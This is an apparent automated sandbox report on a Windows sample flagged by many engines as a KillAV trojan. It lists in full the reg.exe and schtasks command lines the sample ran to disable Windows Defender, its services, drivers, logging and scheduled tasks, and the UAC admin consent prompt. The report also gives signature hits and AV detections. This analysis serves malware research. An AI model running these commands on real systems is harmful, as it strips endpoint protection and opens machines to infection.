Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 28, 2021, 12:01 p.m. | March 28, 2021, 12:05 p.m. |

Process | Command line | PID |
---|---|---|
reg.exe | reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f | 1304 |
reg.exe | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f | 1976 |
reg.exe | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | 1812 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | 1760 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | 2660 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | 2656 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | 1032 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | 604 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | 1468 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | 2444 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | 1972 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | 812 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | 2112 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | 2312 |
reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f | 2832 |
reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | 1892 |
reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | 2948 |
schtasks.exe | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | 1296 |
schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | 2768 |
schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | 2840 |
schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | 2976 |
schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | 1868 |
reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f | 668 |
reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f | 2560 |
reg.exe | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | 3032 |
reg.exe | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f | 2800 |
reg.exe | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f | 2760 |
reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f | 2724 |
reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f | 2648 |
reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f | 2232 |
reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f | 3104 |
reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f | 3148 |

Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |

IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Type | Value |
---|---|
section | .sxdata |
packer | Armadillo v1.71 |
file | C:\Users\test22\AppData\Local\Temp\7zS6318.tmp\Disable Window Defender.bat |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
file | C:\Users\test22\AppData\Local\Temp\7zS6318.tmp\Disable Window Defender.bat |
file | C:\Users\test22\AppData\Local\Temp\7zS6318.tmp |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin |
registry | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\SpyNet |

Signature description | Evidence type | Value |
---|---|---|
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting\DisableEnhancedNotifications |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine\MpEnablePus |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting |
attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection |
attempts to disable windows defender | registry | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start |


Engine | Detection |
---|---|
MicroWorld-eScan | Trojan.GenericKD.36583912 |
ALYac | Trojan.GenericKD.36583912 |
Cylance | Unsafe |
VIPRE | Trojan.Win32.Generic!BT |
AegisLab | Trojan.Win32.Agent.4!c |
Sangfor | Trojan.Win32.Ymacco.AA79 |
K7AntiVirus | Riskware ( 0040eff71 ) |
Alibaba | Trojan:Win32/KillAV.14f7215e |
K7GW | Riskware ( 0040eff71 ) |
Arcabit | Trojan.Generic.D22E39E8 |
ESET-NOD32 | BAT/KillAV.NFF |
Kaspersky | Trojan.Win32.Agent.xahhhi |
BitDefender | Trojan.GenericKD.36583912 |
Avast | FileRepMalware |
Ad-Aware | Trojan.GenericKD.36583912 |
McAfee-GW-Edition | RDN/Generic.dx |
FireEye | Trojan.GenericKD.36583912 |
Emsisoft | Trojan.GenericKD.36583912 (B) |
APEX | Malicious |
Webroot | W32.Malware.Gen |
Avira | BAT/KillAV.gyfuy |
MAX | malware (ai score=80) |
Microsoft | Trojan:Win32/Ymacco.AA79 |
ZoneAlarm | Trojan.Win32.Agent.xahhhi |
GData | Trojan.GenericKD.36583912 |
Cynet | Malicious (score: 90) |
McAfee | RDN/Generic.dx |
VBA32 | Trojan.Wacatac |
Ikarus | Trojan.BAT.KillAV |
Fortinet | BAT/KillAV.NFF!tr |
AVG | FileRepMalware |
Panda | Trj/CI.A |
Qihoo-360 | Win32/Trojan.KillAV.HykCI3wA |

Type | Value |
---|---|
service | WdNisDrv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start) |
service | WdBoot (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start) |
service | WdNisSvc (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start) |
service | WdFilter (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start) |
service | WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start) |